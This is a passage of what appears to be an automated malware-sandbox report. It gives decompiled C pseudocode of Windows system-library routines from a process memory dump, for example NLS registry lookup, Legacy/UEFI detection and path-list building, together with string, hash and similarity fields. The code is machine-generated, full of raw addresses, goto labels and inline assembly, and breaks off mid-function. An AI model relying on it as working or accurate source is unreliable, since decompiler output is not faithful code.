                                                      				signed short* _t75;
                                                      				signed int _t76;
                                                      				signed short* _t78;
                                                      				signed int _t83;
                                                      				short* _t93;
                                                      				signed short* _t94;
                                                      				short* _t96;
                                                      				void* _t97;
                                                      				signed int _t99;
                                                      				void* _t101;
                                                      				void* _t102;
                                                      
                                                      				_t80 = __ecx;
                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                      				_t96 = __edx;
                                                      				_v44 = __edx;
                                                      				_t78 = 0;
                                                      				_v56 = 0;
                                                      				if(__ecx == 0 || __edx == 0) {
                                                      					L28:
                                                      					_t97 = 0xc000000d;
                                                      				} else {
                                                      					_t93 = _a4;
                                                      					if(_t93 == 0) {
                                                      						goto L28;
                                                      					}
                                                      					_t78 = E017AF358(__ecx, 0xac);
                                                      					if(_t78 == 0) {
                                                      						_t97 = 0xc0000017;
                                                      						L6:
                                                      						if(_v56 != 0) {
                                                      							_push(_v56);
                                                      							E017E95D0();
                                                      						}
                                                      						if(_t78 != 0) {
                                                      							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                      						}
                                                      						return _t97;
                                                      					}
                                                      					E017EFA60(_t78, 0, 0x158);
                                                      					_v48 = _v48 & 0x00000000;
                                                      					_t102 = _t101 + 0xc;
                                                      					 *_t96 = 0;
                                                      					 *_t93 = 0;
                                                      					E017EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                      					_v36 = 0x18;
                                                      					_v28 =  &_v44;
                                                      					_v64 = 0;
                                                      					_push( &_v36);
                                                      					_push(0x20019);
                                                      					_v32 = 0;
                                                      					_push( &_v64);
                                                      					_v24 = 0x40;
                                                      					_v20 = 0;
                                                      					_v16 = 0;
                                                      					_t97 = E017E9600();
                                                      					if(_t97 < 0) {
                                                      						goto L6;
                                                      					}
                                                      					E017EBB40(0,  &_v36, L"InstallLanguageFallback");
                                                      					_push(0);
                                                      					_v48 = 4;
                                                      					_t97 = L017AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                      					if(_t97 >= 0) {
                                                      						if(_v52 != 1) {
                                                      							L17:
                                                      							_t97 = 0xc0000001;
                                                      							goto L6;
                                                      						}
                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                      						_t94 = _t78;
                                                      						_t83 = _t59;
                                                      						if(_t59 == 0) {
                                                      							L19:
                                                      							if(_t83 == 0) {
                                                      								L23:
                                                      								E017EBB40(_t83, _t102 + 0x24, _t78);
                                                      								if(L017B43C0( &_v48,  &_v64) == 0) {
                                                      									goto L17;
                                                      								}
                                                      								_t84 = _v48;
                                                      								 *_v48 = _v56;
                                                      								if( *_t94 != 0) {
                                                      									E017EBB40(_t84, _t102 + 0x24, _t94);
                                                      									if(L017B43C0( &_v48,  &_v64) != 0) {
                                                      										 *_a4 = _v56;
                                                      									} else {
                                                      										_t97 = 0xc0000001;
                                                      										 *_v48 = 0;
                                                      									}
                                                      								}
                                                      								goto L6;
                                                      							}
                                                      							_t83 = _t83 & 0x0000ffff;
                                                      							while(_t83 == 0x20) {
                                                      								_t94 =  &(_t94[1]);
                                                      								_t74 =  *_t94 & 0x0000ffff;
                                                      								_t83 = _t74;
                                                      								if(_t74 != 0) {
                                                      									continue;
                                                      								}
                                                      								goto L23;
                                                      							}
                                                      							goto L23;
                                                      						} else {
                                                      							goto L14;
                                                      						}
                                                      						while(1) {
                                                      							L14:
                                                      							_t27 =  &(_t94[1]); // 0x2
                                                      							_t75 = _t27;
                                                      							if(_t83 == 0x2c) {
                                                      								break;
                                                      							}
                                                      							_t94 = _t75;
                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                      							_t83 = _t76;
                                                      							if(_t76 != 0) {
                                                      								continue;
                                                      							}
                                                      							goto L23;
                                                      						}
                                                      						 *_t94 = 0;
                                                      						_t94 = _t75;
                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                      						goto L19;
                                                      					}
                                                      				}
                                                      			}

                                                      Strings
                                                      • @, xrefs: 017AE6C0
                                                      • InstallLanguageFallback, xrefs: 017AE6DB
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017AE68C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                      • Instruction ID: 2a36cd8cc6b2792d7f1ef65a31f5f5a25b610ead4f1788c675461987b3c87494
                                                      • Opcode Fuzzy Hash: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                      • Instruction Fuzzy Hash: 8D51A6B15043469BD715DF24C884AABF7E8BF88714F45096EF985D7250FB34DA04CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0186E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				intOrPtr _v48;
                                                      				signed int _v52;
                                                      				unsigned int _v56;
                                                      				char _v60;
                                                      				signed int _v64;
                                                      				char _v68;
                                                      				signed int _v72;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				char _t87;
                                                      				signed int _t90;
                                                      				signed int _t94;
                                                      				signed int _t100;
                                                      				intOrPtr* _t113;
                                                      				signed int _t122;
                                                      				void* _t132;
                                                      				void* _t135;
                                                      				signed int _t139;
                                                      				signed int* _t141;
                                                      				signed int _t146;
                                                      				signed int _t147;
                                                      				void* _t153;
                                                      				signed int _t155;
                                                      				signed int _t159;
                                                      				char _t166;
                                                      				void* _t172;
                                                      				void* _t176;
                                                      				signed int _t177;
                                                      				intOrPtr* _t179;
                                                      
                                                      				_t179 = __ecx;
                                                      				_v48 = __edx;
                                                      				_v68 = 0;
                                                      				_v72 = 0;
                                                      				_push(__ecx[1]);
                                                      				_push( *__ecx);
                                                      				_push(0);
                                                      				_t153 = 0x14;
                                                      				_t135 = _t153;
                                                      				_t132 = E0186BBBB(_t135, _t153);
                                                      				if(_t132 == 0) {
                                                      					_t166 = _v68;
                                                      					goto L43;
                                                      				} else {
                                                      					_t155 = 0;
                                                      					_v52 = 0;
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					_v56 = __ecx[1];
                                                      					if( *__ecx >> 8 < 2) {
                                                      						_t155 = 1;
                                                      						_v52 = 1;
                                                      					}
                                                      					_t139 = _a4;
                                                      					_t87 = (_t155 << 0xc) + _t139;
                                                      					_v60 = _t87;
                                                      					if(_t87 < _t139) {
                                                      						L11:
                                                      						_t166 = _v68;
                                                      						L12:
                                                      						if(_t132 != 0) {
                                                      							E0186BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                      						}
                                                      						L43:
                                                      						if(_v72 != 0) {
                                                      							_push( *((intOrPtr*)(_t179 + 4)));
                                                      							_push( *_t179);
                                                      							_push(0x8000);
                                                      							E0186AFDE( &_v72,  &_v60);
                                                      						}
                                                      						L46:
                                                      						return _t166;
                                                      					}
                                                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                      					asm("sbb edi, edi");
                                                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                      					if(_t90 != 0) {
                                                      						_push(0);
                                                      						_push(0x14);
                                                      						_push( &_v44);
                                                      						_push(3);
                                                      						_push(_t179);
                                                      						_push(0xffffffff);
                                                      						if(E017E9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                      							_push(_t139);
                                                      							E0186A80D(_t179, 1, _v40, 0);
                                                      							_t172 = 4;
                                                      						}
                                                      					}
                                                      					_t141 =  &_v72;
                                                      					if(E0186A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                      						_v64 = _a4;
                                                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                      						asm("sbb edi, edi");
                                                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                      						if(_t94 != 0) {
                                                      							_push(0);
                                                      							_push(0x14);
                                                      							_push( &_v24);
                                                      							_push(3);
                                                      							_push(_t179);
                                                      							_push(0xffffffff);
                                                      							if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                      								_push(_t141);
                                                      								E0186A80D(_t179, 1, _v20, 0);
                                                      								_t176 = 4;
                                                      							}
                                                      						}
                                                      						if(E0186A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                      							goto L11;
                                                      						} else {
                                                      							_t177 = _v64;
                                                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                      							_t100 = _v52 + _v52;
                                                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                      							 *(_t132 + 0x10) = _t146;
                                                      							asm("bsf eax, [esp+0x18]");
                                                      							_v52 = _t100;
                                                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                      							_t47 =  &_a8;
                                                      							 *_t47 = _a8 & 0x00000001;
                                                      							if( *_t47 == 0) {
                                                      								E017C2280(_t179 + 0x30, _t179 + 0x30);
                                                      							}
                                                      							_t147 =  *(_t179 + 0x34);
                                                      							_t159 =  *(_t179 + 0x38) & 1;
                                                      							_v68 = 0;
                                                      							if(_t147 == 0) {
                                                      								L35:
                                                      								E017BB090(_t179 + 0x34, _t147, _v68, _t132);
                                                      								if(_a8 == 0) {
                                                      									E017BFFB0(_t132, _t177, _t179 + 0x30);
                                                      								}
                                                      								asm("lock xadd [eax], ecx");
                                                      								asm("lock xadd [eax], edx");
                                                      								_t132 = 0;
                                                      								_v72 = _v72 & 0;
                                                      								_v68 = _v72;
                                                      								if(E017C7D50() == 0) {
                                                      									_t113 = 0x7ffe0388;
                                                      								} else {
                                                      									_t177 = _v64;
                                                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      								}
                                                      								if( *_t113 == _t132) {
                                                      									_t166 = _v68;
                                                      									goto L46;
                                                      								} else {
                                                      									_t166 = _v68;
                                                      									E0185FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                      									goto L12;
                                                      								}
                                                      							} else {
                                                      								L23:
                                                      								while(1) {
                                                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                      										_t122 =  *_t147;
                                                      										if(_t159 == 0) {
                                                      											L32:
                                                      											if(_t122 == 0) {
                                                      												L34:
                                                      												_v68 = 0;
                                                      												goto L35;
                                                      											}
                                                      											L33:
                                                      											_t147 = _t122;
                                                      											continue;
                                                      										}
                                                      										if(_t122 == 0) {
                                                      											goto L34;
                                                      										}
                                                      										_t122 = _t122 ^ _t147;
                                                      										goto L32;
                                                      									}
                                                      									_t122 =  *(_t147 + 4);
                                                      									if(_t159 == 0) {
                                                      										L27:
                                                      										if(_t122 != 0) {
                                                      											goto L33;
                                                      										}
                                                      										L28:
                                                      										_v68 = 1;
                                                      										goto L35;
                                                      									}
                                                      									if(_t122 == 0) {
                                                      										goto L28;
                                                      									}
                                                      									_t122 = _t122 ^ _t147;
                                                      									goto L27;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_v72 = _v72 & 0x00000000;
                                                      					goto L11;
                                                      				}
                                                      			}





































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: b75a7ac0a7951a91b8104795e1e21f79f81878431385b116c4126f03d84f640c
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: 34919F752043429FE725CE29C845B1BBBEABF84714F14892DFA95CB280E774EA04CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E018251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed short* _t63;
                                                      				signed int _t64;
                                                      				signed int _t65;
                                                      				signed int _t67;
                                                      				intOrPtr _t74;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t88;
                                                      				intOrPtr _t94;
                                                      				void* _t100;
                                                      				void* _t103;
                                                      				intOrPtr _t105;
                                                      				signed int _t106;
                                                      				short* _t108;
                                                      				signed int _t110;
                                                      				signed int _t113;
                                                      				signed int* _t115;
                                                      				signed short* _t117;
                                                      				void* _t118;
                                                      				void* _t119;
                                                      
                                                      				_push(0x80);
                                                      				_push(0x18805f0);
                                                      				E017FD0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                      				_t115 =  *(_t118 + 0xc);
                                                      				 *(_t118 - 0x7c) = _t115;
                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                      				_t113 = 0;
                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                      				_t100 = __ecx;
                                                      				if(_t100 == 0) {
                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                      					E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                      					_t63 =  *(_t118 - 0x90);
                                                      					_t101 = _t63[2];
                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                      					L20:
                                                      					_t65 = _t64 >> 1;
                                                      					L21:
                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                      					if(_t108 == 0) {
                                                      						L27:
                                                      						 *_t115 = _t65 + 1;
                                                      						_t67 = 0xc0000023;
                                                      						L28:
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                      						L29:
                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                      						E018253CA(0);
                                                      						return E017FD130(0, _t113, _t115);
                                                      					}
                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                      							 *_t108 = 0;
                                                      						}
                                                      						goto L27;
                                                      					}
                                                      					 *_t115 = _t65;
                                                      					_t115 = _t65 + _t65;
                                                      					E017EF3E0(_t108, _t101, _t115);
                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                      					_t67 = 0;
                                                      					goto L28;
                                                      				}
                                                      				_t103 = _t100 - 1;
                                                      				if(_t103 == 0) {
                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                      					_t74 = E017C3690(1, _t117, 0x1781810, _t118 - 0x74);
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                      					_t101 = _t117[2];
                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                      					if(_t74 < 0) {
                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                      						_t115 =  *(_t118 - 0x7c);
                                                      						goto L20;
                                                      					}
                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                      					_t115 =  *(_t118 - 0x7c);
                                                      					goto L21;
                                                      				}
                                                      				if(_t103 == 1) {
                                                      					_t105 = 4;
                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                      					_push(_t118 - 0x70);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push(_t105);
                                                      					_push(_t118 - 0x78);
                                                      					_push(0x6b);
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E017EAA90();
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                      					_t113 = L017C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                      					if(_t113 != 0) {
                                                      						_push(_t118 - 0x70);
                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                      						_push(_t113);
                                                      						_push(4);
                                                      						_push(_t118 - 0x78);
                                                      						_push(0x6b);
                                                      						_t84 = E017EAA90();
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                      						if(_t84 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t110 = 0;
                                                      						_t106 = 0;
                                                      						while(1) {
                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                      							 *(_t118 - 0x88) = _t106;
                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                      								break;
                                                      							}
                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                      							_t106 = _t106 + 1;
                                                      						}
                                                      						_t88 = E0182500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                      						_t119 = _t119 + 0x1c;
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                      						if(_t88 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t101 = _t118 - 0x3c;
                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                      						goto L21;
                                                      					}
                                                      					_t67 = 0xc0000017;
                                                      					goto L28;
                                                      				}
                                                      				_push(0);
                                                      				_push(0x20);
                                                      				_push(_t118 - 0x60);
                                                      				_push(0x5a);
                                                      				_t94 = E017E9860();
                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                      				if(_t94 < 0) {
                                                      					goto L29;
                                                      				}
                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                      					_t101 = L"Legacy";
                                                      					_push(6);
                                                      				} else {
                                                      					_t101 = L"UEFI";
                                                      					_push(4);
                                                      				}
                                                      				_pop(_t65);
                                                      				goto L21;
                                                      			}























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                      • Instruction ID: 008318ce3e15eef821459af737733174a08b5b851112c97771b97861ac569822
                                                      • Opcode Fuzzy Hash: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                      • Instruction Fuzzy Hash: 665190B1A807199FDB26DFA8C844BEDBBF8FF49700F14402DE649EB291D6709A40CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E017D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                      				char _v3;
                                                      				signed int _v8;
                                                      				signed int _v16;
                                                      				unsigned int _v24;
                                                      				void* _v28;
                                                      				signed int _v32;
                                                      				unsigned int _v36;
                                                      				void* _v37;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				intOrPtr _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _t235;
                                                      				signed int _t239;
                                                      				signed int _t245;
                                                      				signed int _t247;
                                                      				intOrPtr _t249;
                                                      				signed int _t252;
                                                      				signed int _t259;
                                                      				signed int _t262;
                                                      				signed int _t270;
                                                      				signed int _t276;
                                                      				signed int _t278;
                                                      				void* _t280;
                                                      				void* _t281;
                                                      				signed int _t282;
                                                      				unsigned int _t285;
                                                      				signed int _t289;
                                                      				intOrPtr* _t290;
                                                      				signed int _t291;
                                                      				signed int _t295;
                                                      				intOrPtr _t307;
                                                      				signed int _t316;
                                                      				signed int _t318;
                                                      				signed int _t319;
                                                      				signed int _t323;
                                                      				signed int _t324;
                                                      				signed int _t326;
                                                      				void* _t327;
                                                      				signed int _t328;
                                                      				signed int _t330;
                                                      				signed int _t333;
                                                      				void* _t334;
                                                      				void* _t336;
                                                      
                                                      				_t330 = _t333;
                                                      				_t334 = _t333 - 0x4c;
                                                      				_v8 =  *0x189d360 ^ _t330;
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t323 = 0x189b2e8;
                                                      				_v56 = _a4;
                                                      				_v48 = __edx;
                                                      				_v60 = __ecx;
                                                      				_t285 = 0;
                                                      				_v80 = 0;
                                                      				asm("movsd");
                                                      				_v64 = 0;
                                                      				_v76 = 0;
                                                      				_v72 = 0;
                                                      				asm("movsd");
                                                      				_v44 = 0;
                                                      				_v52 = 0;
                                                      				_v68 = 0;
                                                      				asm("movsd");
                                                      				_v32 = 0;
                                                      				_v36 = 0;
                                                      				asm("movsd");
                                                      				_v16 = 0;
                                                      				_t336 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                      				_t276 = 0x48;
                                                      				_t305 = 0 | _t336 == 0x00000000;
                                                      				_t316 = 0;
                                                      				_v37 = _t336 == 0;
                                                      				if(_v48 <= 0) {
                                                      					L16:
                                                      					_t45 = _t276 - 0x48; // 0x0
                                                      					__eflags = _t45 - 0xfffe;
                                                      					if(_t45 > 0xfffe) {
                                                      						_t324 = 0xc0000106;
                                                      						goto L32;
                                                      					} else {
                                                      						_t323 = L017C4620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
                                                      						_v52 = _t323;
                                                      						__eflags = _t323;
                                                      						if(_t323 == 0) {
                                                      							_t324 = 0xc0000017;
                                                      							goto L32;
                                                      						} else {
                                                      							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
                                                      							_t50 = _t323 + 0x48; // 0x48
                                                      							_t318 = _t50;
                                                      							_t305 = _v32;
                                                      							 *(_t323 + 0x3c) = _t276;
                                                      							_t278 = 0;
                                                      							 *((short*)(_t323 + 0x30)) = _v48;
                                                      							__eflags = _t305;
                                                      							if(_t305 != 0) {
                                                      								 *(_t323 + 0x18) = _t318;
                                                      								__eflags = _t305 - 0x1898478;
                                                      								 *_t323 = ((0 | _t305 == 0x01898478) - 0x00000001 & 0xfffffffb) + 7;
                                                      								E017EF3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
                                                      								_t305 = _v32;
                                                      								_t334 = _t334 + 0xc;
                                                      								_t278 = 1;
                                                      								__eflags = _a8;
                                                      								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
                                                      								if(_a8 != 0) {
                                                      									_t270 = E018339F2(_t318);
                                                      									_t305 = _v32;
                                                      									_t318 = _t270;
                                                      								}
                                                      							}
                                                      							_t289 = 0;
                                                      							_v16 = 0;
                                                      							__eflags = _v48;
                                                      							if(_v48 <= 0) {
                                                      								L31:
                                                      								_t324 = _v68;
                                                      								__eflags = 0;
                                                      								 *((short*)(_t318 - 2)) = 0;
                                                      								goto L32;
                                                      							} else {
                                                      								_t276 = _t323 + _t278 * 4;
                                                      								_v56 = _t276;
                                                      								do {
                                                      									__eflags = _t305;
                                                      									if(_t305 != 0) {
                                                      										_t235 =  *(_v60 + _t289 * 4);
                                                      										__eflags = _t235;
                                                      										if(_t235 == 0) {
                                                      											goto L30;
                                                      										} else {
                                                      											__eflags = _t235 == 5;
                                                      											if(_t235 == 5) {
                                                      												goto L30;
                                                      											} else {
                                                      												goto L22;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										L22:
                                                      										 *_t276 =  *(_v60 + _t289 * 4);
                                                      										 *(_t276 + 0x18) = _t318;
                                                      										_t239 =  *(_v60 + _t289 * 4);
                                                      										__eflags = _t239 - 8;
                                                      										if(__eflags > 0) {
                                                      											goto L56;
                                                      										} else {
                                                      											switch( *((intOrPtr*)(_t239 * 4 +  &M017D2959))) {
                                                      												case 0:
                                                      													__ax =  *0x1898488;
                                                      													__eflags = __ax;
                                                      													if(__ax == 0) {
                                                      														goto L29;
                                                      													} else {
                                                      														__ax & 0x0000ffff = E017EF3E0(__edi,  *0x189848c, __ax & 0x0000ffff);
                                                      														__eax =  *0x1898488 & 0x0000ffff;
                                                      														goto L26;
                                                      													}
                                                      													goto L118;
                                                      												case 1:
                                                      													L45:
                                                      													E017EF3E0(_t318, _v80, _v64);
                                                      													_t265 = _v64;
                                                      													goto L26;
                                                      												case 2:
                                                      													 *0x1898480 & 0x0000ffff = E017EF3E0(__edi,  *0x1898484,  *0x1898480 & 0x0000ffff);
                                                      													__eax =  *0x1898480 & 0x0000ffff;
                                                      													__eax = ( *0x1898480 & 0x0000ffff) >> 1;
                                                      													__edi = __edi + __eax * 2;
                                                      													goto L28;
                                                      												case 3:
                                                      													__eax = _v44;
                                                      													__eflags = __eax;
                                                      													if(__eax == 0) {
                                                      														goto L29;
                                                      													} else {
                                                      														__esi = __eax + __eax;
                                                      														__eax = E017EF3E0(__edi, _v72, __esi);
                                                      														__edi = __edi + __esi;
                                                      														__esi = _v52;
                                                      														goto L27;
                                                      													}
                                                      													goto L118;
                                                      												case 4:
                                                      													_push(0x2e);
                                                      													_pop(__eax);
                                                      													 *(__esi + 0x44) = __edi;
                                                      													 *__edi = __ax;
                                                      													__edi = __edi + 4;
                                                      													_push(0x3b);
                                                      													_pop(__eax);
                                                      													 *(__edi - 2) = __ax;
                                                      													goto L29;
                                                      												case 5:
                                                      													__eflags = _v36;
                                                      													if(_v36 == 0) {
                                                      														goto L45;
                                                      													} else {
                                                      														E017EF3E0(_t318, _v76, _v36);
                                                      														_t265 = _v36;
                                                      													}
                                                      													L26:
                                                      													_t334 = _t334 + 0xc;
                                                      													_t318 = _t318 + (_t265 >> 1) * 2 + 2;
                                                      													__eflags = _t318;
                                                      													L27:
                                                      													_push(0x3b);
                                                      													_pop(_t267);
                                                      													 *((short*)(_t318 - 2)) = _t267;
                                                      													goto L28;
                                                      												case 6:
                                                      													__ebx =  *0x189575c;
                                                      													__eflags = __ebx - 0x189575c;
                                                      													if(__ebx != 0x189575c) {
                                                      														_push(0x3b);
                                                      														_pop(__esi);
                                                      														do {
                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                      															E017EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                      															__edi = __edi + __eax * 2;
                                                      															__edi = __edi + 2;
                                                      															 *(__edi - 2) = __si;
                                                      															__ebx =  *__ebx;
                                                      															__eflags = __ebx - 0x189575c;
                                                      														} while (__ebx != 0x189575c);
                                                      														__esi = _v52;
                                                      														__ecx = _v16;
                                                      														__edx = _v32;
                                                      													}
                                                      													__ebx = _v56;
                                                      													goto L29;
                                                      												case 7:
                                                      													 *0x1898478 & 0x0000ffff = E017EF3E0(__edi,  *0x189847c,  *0x1898478 & 0x0000ffff);
                                                      													__eax =  *0x1898478 & 0x0000ffff;
                                                      													__eax = ( *0x1898478 & 0x0000ffff) >> 1;
                                                      													__eflags = _a8;
                                                      													__edi = __edi + __eax * 2;
                                                      													if(_a8 != 0) {
                                                      														__ecx = __edi;
                                                      														__eax = E018339F2(__ecx);
                                                      														__edi = __eax;
                                                      													}
                                                      													goto L28;
                                                      												case 8:
                                                      													__eax = 0;
                                                      													 *(__edi - 2) = __ax;
                                                      													 *0x1896e58 & 0x0000ffff = E017EF3E0(__edi,  *0x1896e5c,  *0x1896e58 & 0x0000ffff);
                                                      													 *(__esi + 0x38) = __edi;
                                                      													__eax =  *0x1896e58 & 0x0000ffff;
                                                      													__eax = ( *0x1896e58 & 0x0000ffff) >> 1;
                                                      													__edi = __edi + __eax * 2;
                                                      													__edi = __edi + 2;
                                                      													L28:
                                                      													_t289 = _v16;
                                                      													_t305 = _v32;
                                                      													L29:
                                                      													_t276 = _t276 + 4;
                                                      													__eflags = _t276;
                                                      													_v56 = _t276;
                                                      													goto L30;
                                                      											}
                                                      										}
                                                      									}
                                                      									goto L118;
                                                      									L30:
                                                      									_t289 = _t289 + 1;
                                                      									_v16 = _t289;
                                                      									__eflags = _t289 - _v48;
                                                      								} while (_t289 < _v48);
                                                      								goto L31;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					while(1) {
                                                      						L1:
                                                      						_t239 =  *(_v60 + _t316 * 4);
                                                      						if(_t239 > 8) {
                                                      							break;
                                                      						}
                                                      						switch( *((intOrPtr*)(_t239 * 4 +  &M017D2935))) {
                                                      							case 0:
                                                      								__ax =  *0x1898488;
                                                      								__eflags = __ax;
                                                      								if(__eflags != 0) {
